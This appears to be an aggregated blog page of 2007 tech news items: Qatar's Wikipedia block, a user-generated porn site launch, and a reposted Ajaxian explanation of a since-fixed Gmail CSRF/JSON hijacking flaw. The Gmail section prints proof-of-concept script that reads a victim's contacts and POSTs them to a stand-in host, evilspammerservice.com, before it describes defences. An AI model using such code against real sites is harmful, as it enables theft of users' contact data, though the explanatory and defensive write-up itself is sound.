Ajax Girl

Qatar, home to nearly a million people, has been blocked from editing any entry on Wikipedia “due to a large volume of spam and vandalism.”

Apparently Qatar has a single ISP, Qtel, with a single IP address shared by the entire country. Wikipedia has blocked that IP address for anonymous edits, but is allowing users of that IP address with actual Wikipedia accounts to continue to edit articles. There’s one problem, though. You can’t create an account if you enter Wikipedia from that IP address. It’s a bit of a Catch 22, and users will be forced to either use a proxy to enter the site (many of which are also banned), or simply stop editing altogether.

One answer to this problem is for Wikipedia to end anonymous editing and force user accounts on anyone that wants to contribute.

Digg blocks accounts based on IP address, too. I wonder if they’ve also banned Qatar.

Crunch Network: CrunchBoard because it’s time for you to find a new Job2.0

Source: TechCrunch
Original Article: http://feeds.feedburner.com/~r/Techcrunch/~3/69566862/

What better way to ring in the new year than with a site that is most definitely not work safe. Eroshare is to Flickr what PornoTube is to YouTube - user generated porn. The site, which launched an hour ago, encourages users to upload their home made erotic photos, and there is already a bunch of content on the site. EroShare gives 2 GB of free storage with every account and has all the standard photo site bells and whistles - friends, tagging, albums, etc. Eroshare is based - where else - in the Netherlands, and has not yet raised any funding.

Porn obviously continues to be a lucrative Internet business, and user generated stuff is apparently a healthy category if PornoTube’s growth is any indication. Just realize that the innocent photo you took with your boyfriend, girlfriend, ex-spouse or random stranger may very quickly end up in front of millions.

Crunch Network: MobileCrunch Mobile Gadgets and Applications, Delivered Daily.

Source: TechCrunch
Original Article: http://feeds.feedburner.com/~r/Techcrunch/~3/69503135/

The last thing I want to do right now is post on another problem over at Google, but this was a big one. Basically, a website could download your entire Gmail contact list by adding a bit of code to their server and exploiting Google’s JSON API. The problem has apparently been fixed, very soon after the vulnerability was found.

I’m not going to go on and on (again) about how much trouble Google is getting into with these problems. In this case, days did not go by before Google responded to the problem. They addressed it immediately.

This is good fodder for the ongoing JSON debate, though.

Crunch Network: CrunchGear drool over the sexiest new gadgets and hardware.

Source: TechCrunch
Original Article: http://feeds.feedburner.com/~r/Techcrunch/~3/69473134/

There is a lot of chatter regarding a CSRF security flaw in Gmail.

CSRF attacks are Cross Site Request Forgery attacks, which are cousins of XSS, but different.

Joe Walker of DWR has written a detailed account of CSRF and how to avoid exposing your applications to them.

Anatomy of the Gmail Attack

If you were logged onto GMail then visiting this page will show you all your GMail contacts. How does it work?

The attack uses script tags, and just assumes that you are logged-on. Since most GMail users are permanently logged on, this isn’t a huge problem.

There is a Google URL that returns some script containing your contacts:


http://docs.google.com/data/contacts?out=js&show=ALL&psort=Affinity&callback=google&max=99999


The page will look like this:

PLAIN TEXT

JAVASCRIPT:

1.  
2. google ({
3.   Success: true,
4.   Errors: [],
5.   Body: {
6.     AuthToken: {
7.       Value: ‘********’
8.     },
9.     Contacts: [
10.       {
11.         Id: ‘***’,
12.         Email: ‘users at dwr.dev.java.net’,
13.         Affinity: ***,
14.         Groups: [
15.           {
16.             id: ‘^Freq’,
17.             value: ‘users at dwr.dev.java.net’
18.           }
19.         ],
20.         Addressess: [],
21.         Phoness: [],
22.         Imss: []
23.       },
24.     // Lots more contacts here
25.     ]
26.   }
27. })
28.  

So we’re calling a function “google()” and passing it a data structure that includes all your contacts. So all we need to do is to do something with this data. The page I linked-to earlier creates a list from it using code like this:

PLAIN TEXT

HTML:

1.  
2. <script type=”text/javascript”>
3. function google(data){
4.     var emails, i;
5.     for (i = 0; i <data.Body.Contacts.length; i++) {
6.         mails += “<li>" + data.Body.Contacts[i].Email + "";
7.     }
8.     document.write("<ol>" + emails + "</ol>");
9. }
10. </script>
11.  
12. <script type=”text/javascript” src=”http://docs.google.com/data/contacts?out=js&show=ALL&psort=Affinity&callback=google&max=99999″>
13. </script>
14.  

But it would be just as easy to post the list of addresses off to some spam address catcher service:

PLAIN TEXT

HTML:

1.  
2. <script type=”text/javascript”>
3. function google(data){
4.     var body, i;
5.     for (i = 0; i <data.Body.Contacts.length; i++) {
6.         body += data.Body.Contacts[i].Email + “\n”;
7.     }
8.     var xhr = new ActiveXObject(”Microsoft.XMLHTTP”);
9.     xhr.open(”POST”, “http://evilspammerservice.com/catcher”);
10.     xhr.send(body);
11. }
12. </script>
13.  

How to Protect Your Server

There are 2 known solutions to CSRF attacks: secret hidden fields and scripted cookies.

Things that wont protect you:

• Switching to POST and denying GET: Forms can be trivially altered with DOM manipulation to forge POST requests.
• Checking the referrer field: the referrer field is open to manipulation and it is sometimes not sent by browsers. So you are left with a choice between allowing no referrer (an attacker can get around this) and denying no referrer (breaks many innocent users).
• JSON: Removing the function call in the GMail example would mean we would have to use XHR rather then just a simple Script Tag. The door is still wide open.

Secret Hidden Fields

If all your sensitive URLs contain some secret shipped with the page, then the cross-domain rules in the browser will stop an attacker from discovering the secret, so the server can distinguish between submissions that come from pages supplied by the server (which are safe).

This technique is good for the “Web 1.0″ situations which are light on scripting. It is fairly complex to setup because it requires the server to keep a track of the secret, and to manipulate all forms to contain a hidden field.

Double Submit the Cookie

The CSRF attack works by subverting what the browser will do with the cookie.  Ideally, your cookies would be totally unavailable to anyone outside of your domain. This attack works because XMLHttpRequest in some page can use the cookies of some foreign domain when posting to that foreign domain. However the script can not read the cookie directly due to the cross-domain rules, so a slight modification of the hidden field solution is to read the session cookie using JavaScript and then adding to URLs, forms or the body of a POST request, and then checking in the server that the session cookie value that the browser sends in the header (which is subvertable) is the same as the session cookie in the request (this is not subvertable in the same way).

If you are using Ajax or a significant amount of scripting then this solution is a simple fix once solution.

Use a Library

Specifically - use DWR. If you are using DWR version 2 then this CSRF protection comes for free. DWR implements the double cookie submission pattern transparently.

There is some talk on ZDNet and it appears that Digg may have the same issue.

Source: Ajaxian
Original Article: http://ajaxian.com/archives/gmail-csrf-security-flaw

Christian Decker wanted to access Google Calendar’s new JSON services in a simple way, so he has created, and shared GCalendar, an API for doing just that.

Source: Ajaxian
Original Article: http://ajaxian.com/archives/gcalendar-accessing-google-calendar-from-javascript

The jsFlickrSlideshow is a JavaScript component that wraps the canvas tag to display images from Flickr.

• Check out the project home page
• View the Demo
• Download the code

Source: Ajaxian
Original Article: http://ajaxian.com/archives/jsflickrslideshow-sliding-through-flickr